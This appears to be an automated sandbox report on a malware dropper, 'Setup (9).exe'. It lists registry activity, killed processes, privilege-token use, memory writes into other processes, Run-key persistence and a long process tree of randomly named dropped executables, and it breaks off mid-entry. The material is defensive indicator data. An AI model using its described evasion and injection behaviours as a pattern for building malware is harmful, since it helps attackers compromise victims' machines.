Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	6lSzGpKBNwPTtXTimMDJulCB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
1500	taskkill.exe
8900	taskkill.exe
10624	taskkill.exe
8060	taskkill.exe

Modifies data under HKEY_USERS 43 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	sihclient.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	sihclient.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	sihclient.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3664	PING.EXE

Script User-Agent 6 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	445	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	90	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	100	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	144	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	166	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	422	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3584	Setup (9).exe
3584	Setup (9).exe
4064	WerFault.exe
4064	WerFault.exe
2468	WerFault.exe
2468	WerFault.exe
2412	WerFault.exe
2412	WerFault.exe
4132	Process not Found
4132	Process not Found
4704	J77cmUgJX0OQi4nZtiqUPG2L.exe
4704	J77cmUgJX0OQi4nZtiqUPG2L.exe
4704	J77cmUgJX0OQi4nZtiqUPG2L.exe
4704	J77cmUgJX0OQi4nZtiqUPG2L.exe
4704	J77cmUgJX0OQi4nZtiqUPG2L.exe
4704	J77cmUgJX0OQi4nZtiqUPG2L.exe
4704	J77cmUgJX0OQi4nZtiqUPG2L.exe
4704	J77cmUgJX0OQi4nZtiqUPG2L.exe
4704	J77cmUgJX0OQi4nZtiqUPG2L.exe
4704	J77cmUgJX0OQi4nZtiqUPG2L.exe
4704	J77cmUgJX0OQi4nZtiqUPG2L.exe
4704	J77cmUgJX0OQi4nZtiqUPG2L.exe
864	schtasks.exe
864	schtasks.exe
5500	WerFault.exe
5500	WerFault.exe
3528	Process not Found
3528	Process not Found
6260	6lSzGpKBNwPTtXTimMDJulCB.exe
6260	6lSzGpKBNwPTtXTimMDJulCB.exe
6760	msedge.exe
6760	msedge.exe
6208	WerFault.exe
6208	WerFault.exe
5764	msedge.exe
5764	msedge.exe
6908	Setup.exe
6908	Setup.exe
6908	Setup.exe
6908	Setup.exe
6908	Setup.exe
6908	Setup.exe
6908	Setup.exe
6908	Setup.exe
1412	6lSzGpKBNwPTtXTimMDJulCB.exe
1412	6lSzGpKBNwPTtXTimMDJulCB.exe
5196	W3SGPRNzsnviCFwyWGjWU3KW.exe
5196	W3SGPRNzsnviCFwyWGjWU3KW.exe
1876	SwCHiM1k_kk0mykkYJb5onl3.exe
1876	SwCHiM1k_kk0mykkYJb5onl3.exe
5492	1359090.exe
5492	1359090.exe
8264	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
8264	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
4852	8843854.exe
4852	8843854.exe
4676	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
4676	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
1436	6OUn4xmB6r0O7c3V5b7YH6lz.exe
1436	6OUn4xmB6r0O7c3V5b7YH6lz.exe
3668	identity_helper.exe
3668	identity_helper.exe
3056	WerFault.exe
3056	WerFault.exe

Suspicious behavior: SetClipboardViewer 5 IoCs

pid	Process
3880	WinHoster.exe
6772	8676110.exe
7136	1234599.exe
3720	5245631.exe
9964	5761493.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

description	pid	Process
Token: SeDebugPrivilege	1800	r89nXplmqQE5PqLkZO2pCalF.exe
Token: SeDebugPrivilege	1172	Qy6qE9ZI7Djrb_apEAlf61NL.exe
Token: SeRestorePrivilege	4132	Process not Found
Token: SeBackupPrivilege	4132	Process not Found
Token: SeRestorePrivilege	2468	WerFault.exe
Token: SeBackupPrivilege	2468	WerFault.exe
Token: SeBackupPrivilege	2468	WerFault.exe
Token: SeDebugPrivilege	1500	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
Token: SeDebugPrivilege	1876	SwCHiM1k_kk0mykkYJb5onl3.exe
Token: SeDebugPrivilege	4852	8843854.exe
Token: SeDebugPrivilege	5196	W3SGPRNzsnviCFwyWGjWU3KW.exe
Token: SeDebugPrivilege	5492	1359090.exe
Token: SeDebugPrivilege	1336	fA8YUw_bCw4n8NoOFcuKKYLJ.exe
Token: SeDebugPrivilege	5988	CBqmMk964nU0xwXkbiyzKbM1.exe
Token: SeDebugPrivilege	1412	6lSzGpKBNwPTtXTimMDJulCB.exe
Token: SeDebugPrivilege	1436	6OUn4xmB6r0O7c3V5b7YH6lz.exe
Token: SeDebugPrivilege	3336	PBrowFile15.exe
Token: SeDebugPrivilege	2252	LivelyScreenRecS3.0.exe
Token: SeDebugPrivilege	4676	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
Token: SeDebugPrivilege	3204	2885826.exe
Token: SeDebugPrivilege	1168	5363346.exe
Token: SeDebugPrivilege	2464	1830006.exe
Token: SeDebugPrivilege	6184	3842319.exe
Token: SeDebugPrivilege	7164	8500963.exe
Token: SeDebugPrivilege	7436	7080958.exe
Token: SeDebugPrivilege	7260	SwCHiM1k_kk0mykkYJb5onl3.exe
Token: SeDebugPrivilege	7956	SwCHiM1k_kk0mykkYJb5onl3.exe
Token: SeDebugPrivilege	8448	_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
Token: SeTcbPrivilege	8456	svchost.exe
Token: SeTcbPrivilege	8456	svchost.exe
Token: SeTcbPrivilege	8456	svchost.exe
Token: SeTcbPrivilege	8456	svchost.exe
Token: SeTcbPrivilege	8456	svchost.exe
Token: SeTcbPrivilege	8456	svchost.exe
Token: SeDebugPrivilege	6884	4279560.exe
Token: SeDebugPrivilege	4988	Giyc9wHXHZXVayLRxBGvxuK1.exe
Token: SeDebugPrivilege	7296	4289139.exe
Token: SeDebugPrivilege	6576	3354566.exe
Token: SeDebugPrivilege	7020	Process not Found
Token: SeDebugPrivilege	9500	6135883.exe
Token: SeDebugPrivilege	8484	LDeU69DcMR0AGn5BdddwQh75.exe
Token: SeDebugPrivilege	8044	oknkj3dgMfP3jsqyxrBoQt3z.exe
Token: SeDebugPrivilege	9912	2141206.exe
Token: SeDebugPrivilege	8476	qSXlY8i3KwcYJEfW8ywqf8mg.exe
Token: SeDebugPrivilege	576	SwCHiM1k_kk0mykkYJb5onl3.exe
Token: SeDebugPrivilege	8900	taskkill.exe
Token: SeDebugPrivilege	5228	4piv6ItaQcRTmIG90PsRWaQB.exe
Token: SeDebugPrivilege	4972	Fc00UOz12EnOjcybFq2ea9rb.exe

Suspicious use of FindShellTrayWindow 10 IoCs

pid	Process
5108	ikQKjhB4k6HEzP8ctwvkUexr.tmp
5476	stats.tmp
5764	msedge.exe
8544	SwCHiM1k_kk0mykkYJb5onl3.exe
4412	Tra.exe.com
4412	Tra.exe.com
4412	Tra.exe.com
6808	Tra.exe.com
6808	Tra.exe.com
6808	Tra.exe.com

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
4412	Tra.exe.com
4412	Tra.exe.com
4412	Tra.exe.com
6808	Tra.exe.com
6808	Tra.exe.com
6808	Tra.exe.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3584 wrote to memory of 1428	3584	Setup (9).exe	100
PID 3584 wrote to memory of 1428	3584	Setup (9).exe	100
PID 3584 wrote to memory of 1428	3584	Setup (9).exe	100
PID 3584 wrote to memory of 1448	3584	Setup (9).exe	98
PID 3584 wrote to memory of 1448	3584	Setup (9).exe	98
PID 3584 wrote to memory of 1448	3584	Setup (9).exe	98
PID 3584 wrote to memory of 1472	3584	Setup (9).exe	96
PID 3584 wrote to memory of 1472	3584	Setup (9).exe	96
PID 3584 wrote to memory of 1472	3584	Setup (9).exe	96
PID 3584 wrote to memory of 1436	3584	Setup (9).exe	97
PID 3584 wrote to memory of 1436	3584	Setup (9).exe	97
PID 3584 wrote to memory of 1436	3584	Setup (9).exe	97
PID 3584 wrote to memory of 1412	3584	Setup (9).exe	99
PID 3584 wrote to memory of 1412	3584	Setup (9).exe	99
PID 3584 wrote to memory of 1412	3584	Setup (9).exe	99
PID 3584 wrote to memory of 1172	3584	Setup (9).exe	84
PID 3584 wrote to memory of 1172	3584	Setup (9).exe	84
PID 3584 wrote to memory of 2376	3584	Setup (9).exe	83
PID 3584 wrote to memory of 2376	3584	Setup (9).exe	83
PID 3584 wrote to memory of 2476	3584	Setup (9).exe	82
PID 3584 wrote to memory of 2476	3584	Setup (9).exe	82
PID 3584 wrote to memory of 2476	3584	Setup (9).exe	82
PID 3584 wrote to memory of 1800	3584	Setup (9).exe	93
PID 3584 wrote to memory of 1800	3584	Setup (9).exe	93
PID 3584 wrote to memory of 1636	3584	Setup (9).exe	95
PID 3584 wrote to memory of 1636	3584	Setup (9).exe	95
PID 3584 wrote to memory of 1636	3584	Setup (9).exe	95
PID 3584 wrote to memory of 1336	3584	Setup (9).exe	85
PID 3584 wrote to memory of 1336	3584	Setup (9).exe	85
PID 3584 wrote to memory of 1336	3584	Setup (9).exe	85
PID 3584 wrote to memory of 2464	3584	Setup (9).exe	81
PID 3584 wrote to memory of 2464	3584	Setup (9).exe	81
PID 3584 wrote to memory of 2464	3584	Setup (9).exe	81
PID 3584 wrote to memory of 1888	3584	Setup (9).exe	90
PID 3584 wrote to memory of 1888	3584	Setup (9).exe	90
PID 3584 wrote to memory of 1888	3584	Setup (9).exe	90
PID 3584 wrote to memory of 1684	3584	Setup (9).exe	94
PID 3584 wrote to memory of 1684	3584	Setup (9).exe	94
PID 3584 wrote to memory of 1684	3584	Setup (9).exe	94
PID 3584 wrote to memory of 1936	3584	Setup (9).exe	89
PID 3584 wrote to memory of 1936	3584	Setup (9).exe	89
PID 3584 wrote to memory of 1936	3584	Setup (9).exe	89
PID 3584 wrote to memory of 2144	3584	Setup (9).exe	87
PID 3584 wrote to memory of 2144	3584	Setup (9).exe	87
PID 3584 wrote to memory of 2144	3584	Setup (9).exe	87
PID 3584 wrote to memory of 1868	3584	Setup (9).exe	92
PID 3584 wrote to memory of 1868	3584	Setup (9).exe	92
PID 3584 wrote to memory of 1868	3584	Setup (9).exe	92
PID 3584 wrote to memory of 1176	3584	Setup (9).exe	86
PID 3584 wrote to memory of 1176	3584	Setup (9).exe	86
PID 3584 wrote to memory of 1176	3584	Setup (9).exe	86
PID 3584 wrote to memory of 1896	3584	Setup (9).exe	91
PID 3584 wrote to memory of 1896	3584	Setup (9).exe	91
PID 3584 wrote to memory of 1896	3584	Setup (9).exe	91
PID 3584 wrote to memory of 2500	3584	Setup (9).exe	102
PID 3584 wrote to memory of 2500	3584	Setup (9).exe	102
PID 3584 wrote to memory of 2500	3584	Setup (9).exe	102
PID 3584 wrote to memory of 2492	3584	Setup (9).exe	80
PID 3584 wrote to memory of 2492	3584	Setup (9).exe	80
PID 3584 wrote to memory of 2492	3584	Setup (9).exe	80
PID 3584 wrote to memory of 1344	3584	Setup (9).exe	101
PID 3584 wrote to memory of 1344	3584	Setup (9).exe	101
PID 3584 wrote to memory of 1344	3584	Setup (9).exe	101
PID 3584 wrote to memory of 2092	3584	Setup (9).exe	88

C:\Users\Admin\AppData\Local\Temp\Setup (9).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (9).exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3584
- C:\Users\Admin\Documents\uabPgkiZMD2YJuHV5d3rbwBJ.exe
  "C:\Users\Admin\Documents\uabPgkiZMD2YJuHV5d3rbwBJ.exe"
  2⤵
  - Executes dropped EXE
  PID:2492
- - C:\Users\Admin\Documents\uabPgkiZMD2YJuHV5d3rbwBJ.exe
    "C:\Users\Admin\Documents\uabPgkiZMD2YJuHV5d3rbwBJ.exe" -u
    3⤵
    - Executes dropped EXE
    PID:4300
- C:\Users\Admin\Documents\EL5io2uTzLL3ue6KpQ4V_KCd.exe
  "C:\Users\Admin\Documents\EL5io2uTzLL3ue6KpQ4V_KCd.exe"
  2⤵
  - Executes dropped EXE
  PID:2464
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2464 -s 268
    3⤵
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:2412
- C:\Users\Admin\Documents\ySoHJe_87EJoVpP6wkVVHV_W.exe
  "C:\Users\Admin\Documents\ySoHJe_87EJoVpP6wkVVHV_W.exe"
  2⤵
  - Executes dropped EXE
  PID:2476
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 240
    3⤵
    - Program crash
    PID:864
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:8468
- C:\Users\Admin\Documents\fngXcmjsam0oJRnstReCykOV.exe
  "C:\Users\Admin\Documents\fngXcmjsam0oJRnstReCykOV.exe"
  2⤵
  - Executes dropped EXE
  PID:2376
- C:\Users\Admin\Documents\Qy6qE9ZI7Djrb_apEAlf61NL.exe
  "C:\Users\Admin\Documents\Qy6qE9ZI7Djrb_apEAlf61NL.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1172
- - C:\Users\Admin\AppData\Roaming\5083788.exe
    "C:\Users\Admin\AppData\Roaming\5083788.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:2132
  - - C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: SetClipboardViewer
      PID:3880
- - C:\Users\Admin\AppData\Roaming\5363346.exe
    "C:\Users\Admin\AppData\Roaming\5363346.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1168
- - C:\Users\Admin\AppData\Roaming\5982993.exe
    "C:\Users\Admin\AppData\Roaming\5982993.exe"
    3⤵
    PID:5196
- - C:\Users\Admin\AppData\Roaming\6314129.exe
    "C:\Users\Admin\AppData\Roaming\6314129.exe"
    3⤵
    PID:4676
- - C:\Users\Admin\AppData\Roaming\2431748.exe
    "C:\Users\Admin\AppData\Roaming\2431748.exe"
    3⤵
    PID:1876
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 1876 -s 2336
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      PID:7536
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 1876 -s 2336
      4⤵
      Program crash
      PID:7088
- C:\Users\Admin\Documents\fA8YUw_bCw4n8NoOFcuKKYLJ.exe
  "C:\Users\Admin\Documents\fA8YUw_bCw4n8NoOFcuKKYLJ.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1336
- C:\Users\Admin\Documents\COBGICT1h3fxj2Ecl5f_phT6.exe
  "C:\Users\Admin\Documents\COBGICT1h3fxj2Ecl5f_phT6.exe"
  2⤵
  - Executes dropped EXE
  PID:1176
- C:\Users\Admin\Documents\y2Ht6KicHQKo4tZc9FPphh08.exe
  "C:\Users\Admin\Documents\y2Ht6KicHQKo4tZc9FPphh08.exe"
  2⤵
  - Executes dropped EXE
  PID:2144
- C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
  "C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2092
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    - Executes dropped EXE
    PID:3476
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:3880
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    - Executes dropped EXE
    PID:5128
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    - Executes dropped EXE
    PID:6004
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    - Executes dropped EXE
    PID:4200
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    - Executes dropped EXE
    PID:3972
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:2040
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:1216
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:3740
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:6160
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:6624
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6624 -s 28
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      PID:6208
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:6488
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:6780
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:6712
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:7024
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:7700
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:8616
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:7628
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:8276
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:7640
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:572
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:5568
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:5916
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:8468
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:10236
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:7624
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:7080
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:9416
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:2008
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:8872
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:432
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:7016
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:10372
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:6260
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:11008
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:6164
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:5112
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:8768
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:3592
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:10392
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:7696
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:1108
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:8672
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
